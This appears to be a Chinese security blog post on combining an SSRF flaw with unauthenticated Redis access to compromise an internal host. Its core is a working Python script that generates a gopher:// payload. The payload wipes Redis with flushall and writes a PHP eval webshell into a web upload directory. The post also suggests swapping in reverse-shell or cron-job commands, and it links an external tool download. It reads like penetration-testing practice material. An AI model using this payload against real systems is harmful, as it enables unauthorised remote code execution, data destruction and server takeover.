组合拳SSRF+redis未授权访问

目录

一、SSRF

二、redis未授权访问

三、组合利用

1.写入Webshell

2.反弹shell


一、SSRF

一台web服务器对其他服务器发起请求,以加载其他服务器的web内容或数据

但因请求参数没有进行严格过滤,攻击者可能会通过SSRF漏洞来访问敏感数据、执行未经授权的操作,或者将服务器用于发起攻击其他系统的请求。

二、redis未授权访问

redis数据库如果布置在公网,也就是0.0.0.0,并且没有设置密码,那攻击者可以直接访问redis数据库,通过redis数据库的持久化直接写入后门

如果是绑定在127.0.0.1上,我们直接访问是不行的,所以可以通过ssrf漏洞去访问本地的redis

三、组合利用

通过phpinfo可以发现ip为172.28.0.3,探测172.28.0.2服务器,发现存活

前面的步骤就不仔细讲了,主要是讲通过redis如何写入后门

发现ssrf后,利用bp爆破端口,可以发现6379端口返回了redis的报错信息,说明有redis未授权

那么我们可以直接写入后门,这时有三种方法

1.写入Webshell

这时我们可以在其web目录下通过redis写入后门,但发现不能直接在/var/www/html目录下面写

dirb爆破目录发现有upload目录,那可以写到upload目录下

通过Python脚本或者Gopher-master生成payload

python 复制代码
import urllib.parse

protocol = "gopher://"
ip = "172.22.0.2"  # 运行着redis的内网主机ip
port = "6379"
shell = "\n\n<?php eval($_GET[123]); ?>\n\n"
filename = "shell.php"
path = "/var/www/html/upload"
passwd = ""
cmd = ["flushall",
       "set 1 {}".format(shell.replace(" ", "${IFS}")),
       "config set dir {}".format(path),
       "config set dbfilename {}".format(filename),
       "save"
       ]
if passwd:
    cmd.insert(0, "AUTH {}".format(passwd))
payload = protocol + ip + ":" + port + "/_"


def redis_format(arr):
    CRLF = "\r\n"
    redis_arr = arr.split(" ")
    cmd = ""
    cmd += "*" + str(len(redis_arr))
    for x in redis_arr:
        cmd += CRLF + "$" + str(len((x.replace("${IFS}", " ")))) + CRLF + x.replace("${IFS}", " ")
        cmd += CRLF
    return cmd

if __name__ == "__main__":
    for x in cmd:
        payload += urllib.parse.quote(redis_format(x))
print(payload)

链接:https://pan.baidu.com/s/153ti5n69QI_CPhUta1WpbA?pwd=9peq

提取码:9peq

生成后还需要进行一次urlcode编码,因为生成出来的payload是gopher协议的url编码,所以我们放到浏览器中还需要进行一次urlcode编码

2.反弹shell

和写入Webshell一样,只是把system里面的语句换成反弹shell的语句就行

也可以写入计划任务

相关推荐
字节跳动开源16 分钟前
vArmor:云原生容器安全的多场景应用实践
安全·云原生
morris13137 分钟前
【redis】事务
数据库·redis·缓存·pipeline·lua·事务
WeiLai11124 小时前
面试基础--Redis 缓存穿透、缓存击穿、缓存雪崩深度解析
java·redis·分布式·后端·缓存·面试·架构
zctel4 小时前
java中小型公司面试预习资料(二):Redis
java·redis·面试
shyの同学4 小时前
分布式ID生成方案:数据库号段、Redis与第三方开源实现
redis·分布式·mysql·id
独行soc4 小时前
2025年渗透测试面试题总结-字某跳动-安全研究实习生(三面)(题目+回答)
linux·服务器·安全·web安全·面试·职场和发展
月落星还在4 小时前
Redis 的过期策略与键的过期时间设置
数据库·redis·bootstrap
独行soc4 小时前
2025年渗透测试面试题总结-小某鹏汽车-安全工程师(题目+回答)
网络·科技·安全·面试·汽车·护网·2015年
始终奔跑在路上8 小时前
全栈网络安全|渗透测试-1
网络·安全·web安全·网络安全
Hacker_xingchen10 小时前
网络安全高级软件编程技术 网络安全 软件开发
安全·web安全